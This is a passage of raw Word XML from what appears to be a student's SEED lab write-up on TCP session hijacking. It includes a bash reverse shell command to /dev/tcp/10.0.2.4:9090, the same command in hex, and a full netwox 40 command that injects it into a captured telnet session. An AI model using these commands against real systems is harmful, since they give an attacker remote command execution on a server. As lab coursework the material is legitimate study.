    <w:p w14:paraId="14D9538F" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70675C94" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48578C7B" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61B5281E" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD0F424" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="543302D6" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4400AC06" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68D44BAD" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33682276" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CFED0F3" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16A2CA14" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2F25E5" w14:textId="77777777" w:rsidR="00655268" w:rsidRDefault="00655268" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13647167" w14:textId="35881B59" w:rsidR="00007408" w:rsidRDefault="00007408" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>The packet was successfully captured on the attacker, after which a lot of black packets flow between client and server because of sequence number mismatch introduced by the attacker.</w:t>
      </w:r>
      <w:r w:rsidR="00B927C6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001B3D8E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Hence the malicious command was successfully executed by the attacker and also the session was hijacked between client and server. Hence the demonstration was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0C33CC" w14:textId="612BD700" w:rsidR="00420393" w:rsidRDefault="00007408" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BC6227C" wp14:editId="371E2207">
            <wp:extent cx="5943600" cy="3431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rtualBox_SEED-UBUNTU2_04_03_2018_23_13_1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7EE45814" w14:textId="77777777" w:rsidR="00420393" w:rsidRDefault="00420393" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5F6275" w14:textId="77777777" w:rsidR="009F0556" w:rsidRDefault="009F0556" w:rsidP="009F0556">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28ED8C91" w14:textId="1FA4DCE4" w:rsidR="009F0556" w:rsidRPr="009F0556" w:rsidRDefault="001325DD" w:rsidP="009F0556">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F0556">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 5</w:t>
      </w:r>
      <w:r w:rsidR="00E84768">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="009F0556" w:rsidRPr="009F0556">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Creating Reverse Shell using TCP Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501632AF" w14:textId="5599ED57" w:rsidR="001325DD" w:rsidRPr="001325DD" w:rsidRDefault="006871A3" w:rsidP="006871A3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3040"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF10814" w14:textId="77777777" w:rsidR="00420393" w:rsidRDefault="001325DD" w:rsidP="001325DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Used the following data to be converted to hex data </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42138272" w14:textId="3FCFC587" w:rsidR="001325DD" w:rsidRDefault="001325DD" w:rsidP="001325DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="007F4A99">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>/bin/bash –i &gt; /dev/tcp/10.0.2.4/9090 0&lt;&amp;1 2&gt;&amp;1.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01801FE4" w14:textId="77777777" w:rsidR="001325DD" w:rsidRDefault="001325DD" w:rsidP="001325DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The hex format of the data is: </w:t>
      </w:r>
      <w:r w:rsidRPr="0065400C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="0065400C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2e2f62696e2f62617368202d69203e202f6465762f7463702f31302e302e322e342f3930393020303c263120323e26312e</w:t>
      </w:r>
      <w:r w:rsidRPr="0065400C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5CE588" w14:textId="77777777" w:rsidR="00050775" w:rsidRPr="0065400C" w:rsidRDefault="00050775" w:rsidP="001325DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B542474" w14:textId="77777777" w:rsidR="001325DD" w:rsidRDefault="001325DD" w:rsidP="001325DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="105F36D4" wp14:editId="0EBCDFDA">
            <wp:extent cx="5930900" cy="3114040"/>
            <wp:effectExtent l="0" t="0" r="12700" b="10160"/>
            <wp:docPr id="33" name="Picture 33" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-03-03%20at%2011.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s/Screen%20Shot%202018-03-03%20at%2011.21.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3114040"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56073994" w14:textId="77777777" w:rsidR="001325DD" w:rsidRDefault="001325DD" w:rsidP="001325DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E38B406" w14:textId="77777777" w:rsidR="001325DD" w:rsidRDefault="001325DD" w:rsidP="001325DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>The command above asks the server to redirect all its output to tcp connection (we run tcp server on attacker with IP : 10.0.2.4 and port number 9090). The server also takes its input from standard output (0&lt;&amp;1), the server will redirect its error stream to standard output (2&gt;&amp;1). So finally server takes input from tcp connection and sends its output to tcp connection. This is a reverse shell and is very powerful, because now the attacker can run any arbitrary command on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B106DED" w14:textId="77777777" w:rsidR="00216321" w:rsidRDefault="00216321" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F026798" w14:textId="5CC59B38" w:rsidR="00C7425A" w:rsidRDefault="00216321" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we need to </w:t>
      </w:r>
      <w:r w:rsidR="005E24B1">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">establish a telnet connection between client and server and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>observe the sequence numbers from VM1 to VM2, and spoof a TCP packet from attacker using netwox 40.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73865A46" w14:textId="77777777" w:rsidR="000C5106" w:rsidRDefault="000C5106" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77756AD6" w14:textId="77777777" w:rsidR="000C5106" w:rsidRDefault="000C5106" w:rsidP="000C5106">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Now we capture the last TCP packet from VM1 to VM2. It has the following details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E909D28" w14:textId="77777777" w:rsidR="000C5106" w:rsidRDefault="000C5106" w:rsidP="000C5106">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Src Ip = 10.0.2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA0CD4" w14:textId="77777777" w:rsidR="000C5106" w:rsidRDefault="000C5106" w:rsidP="000C5106">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Dst Ip = 10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FB003F" w14:textId="77777777" w:rsidR="000C5106" w:rsidRDefault="000C5106" w:rsidP="000C5106">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Src port = 56418</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D456BEC" w14:textId="77777777" w:rsidR="000C5106" w:rsidRDefault="000C5106" w:rsidP="000C5106">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Dst port = 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B49FA19" w14:textId="77777777" w:rsidR="000C5106" w:rsidRDefault="000C5106" w:rsidP="000C5106">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Seq Num = 2871258694</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400C8838" w14:textId="77777777" w:rsidR="000C5106" w:rsidRDefault="000C5106" w:rsidP="000C5106">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ack Num = 2238432016</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C8DC52" w14:textId="77777777" w:rsidR="002529E5" w:rsidRDefault="002529E5" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D79F2AD" w14:textId="77777777" w:rsidR="008C7617" w:rsidRDefault="002D5981" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We use the same information as above and create a command using netwox 40 to hijack as below. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D2B020" w14:textId="29C2100B" w:rsidR="008C7617" w:rsidRDefault="008C7617" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">“sudo netwox 40 –ip4-src “10.0.2.6” –ipv4-dst “10.0.2.5” –ipv4-ttl 64 –tcp-dst “23” –tcp-src “56418” </w:t>
      </w:r>
      <w:r w:rsidR="00F60637">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp-seqnum “2871258694” </w:t>
      </w:r>
      <w:r w:rsidR="00B8516A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tcp-acknum “2238432016” --tcp-urg</w:t>
      </w:r>
      <w:r w:rsidR="004677BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004677BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp-ack </w:t>
      </w:r>
      <w:r w:rsidR="004677BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>tcp-psh --tcp-dat</w:t>
      </w:r>
      <w:r w:rsidR="004677BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> “2e20200D0D</w:t>
      </w:r>
      <w:r w:rsidRPr="0065400C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2f62696e2f62617368202d69203e202f6465762f7463702f31302e302e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3887C1CD" w14:textId="0303088F" w:rsidR="001E5074" w:rsidRDefault="008C7617" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0065400C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>322e342f3930393020303c263120323e2631</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0D0D2020”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007C87DC" w14:textId="77777777" w:rsidR="008C7617" w:rsidRDefault="008C7617" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38A1BAAD" w14:textId="2F834B0D" w:rsidR="008C7617" w:rsidRDefault="008C7617" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AE30125" wp14:editId="51AFD6F6">
            <wp:extent cx="5930900" cy="3708400"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="35" name="Picture 35" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-03-04%20at%203.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s/Screen%20Shot%202018-03-04%20at%203.00.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7A83077E" w14:textId="77777777" w:rsidR="00726D42" w:rsidRDefault="00726D42" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536CF047" w14:textId="77777777" w:rsidR="00726D42" w:rsidRDefault="00726D42" w:rsidP="00726D42">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Observe the characters in the command netwox.sh. I have inserted carriage return(0xOD) hexadecimal character before and after the command “/bin/bash –I &gt; /dev/tcp/10.0.2.4/9090 0&lt;&amp;1 2&gt;&amp;1”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC353A7" w14:textId="77777777" w:rsidR="00726D42" w:rsidRDefault="00726D42" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B3429C" w14:textId="77777777" w:rsidR="000C5106" w:rsidRDefault="000C5106" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4281732F" w14:textId="7B2CAF22" w:rsidR="000C5106" w:rsidRDefault="000C5106" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C479C1E" wp14:editId="11C2EBB6">
            <wp:extent cx="5943600" cy="371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rtualBox_SEED-UBUNTU2_04_03_2018_15_20_0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D9604F" w14:textId="77777777" w:rsidR="000C5106" w:rsidRDefault="000C5106" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0967DBB1" w14:textId="154ABFFE" w:rsidR="000C5106" w:rsidRDefault="000C5106" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The figure </w:t>
      </w:r>
      <w:r w:rsidR="00726D42">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">above </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>shows the packet used to hijack the session. (After the hijacking, we can see black packets between client and server because of TCP retransmission happening because of sequence number mismatch between them.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B229D41" w14:textId="77777777" w:rsidR="001E5074" w:rsidRDefault="001E5074" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073AF97B" w14:textId="77777777" w:rsidR="008E5256" w:rsidRDefault="008E5256" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C818B9E" w14:textId="6A346CDB" w:rsidR="008E5256" w:rsidRDefault="008E5256" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>The attacker was able to hijack the session using the reverse shell command and can now type any command from the attacker on the server machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E9227B" w14:textId="2813C200" w:rsidR="001C415F" w:rsidRDefault="001C415F" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11645A46" wp14:editId="1BB742C1">
            <wp:extent cx="5943600" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34" name="Picture 34" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-03-04%20at%202.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s/Screen%20Shot%202018-03-04%20at%202.58.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19063AAA" w14:textId="77777777" w:rsidR="00B616DF" w:rsidRDefault="00B616DF" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="687AB14E" w14:textId="77777777" w:rsidR="0081778E" w:rsidRDefault="0081778E" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34559FB2" w14:textId="77777777" w:rsidR="00207895" w:rsidRDefault="00207895" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E18A55F" w14:textId="77777777" w:rsidR="001A36F4" w:rsidRDefault="001A36F4" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728D1FD9" w14:textId="77777777" w:rsidR="001A36F4" w:rsidRDefault="001A36F4" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DC41B6" w14:textId="156CDE79" w:rsidR="00207895" w:rsidRDefault="00207895" w:rsidP="006D06A3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>The proof is shown below. The attacker</w:t>
      </w:r>
      <w:r w:rsidR="00E44D09">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> tries to create </w:t>
      </w:r>
      <w:r w:rsidR="005F593E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Attack.txt file</w:t>
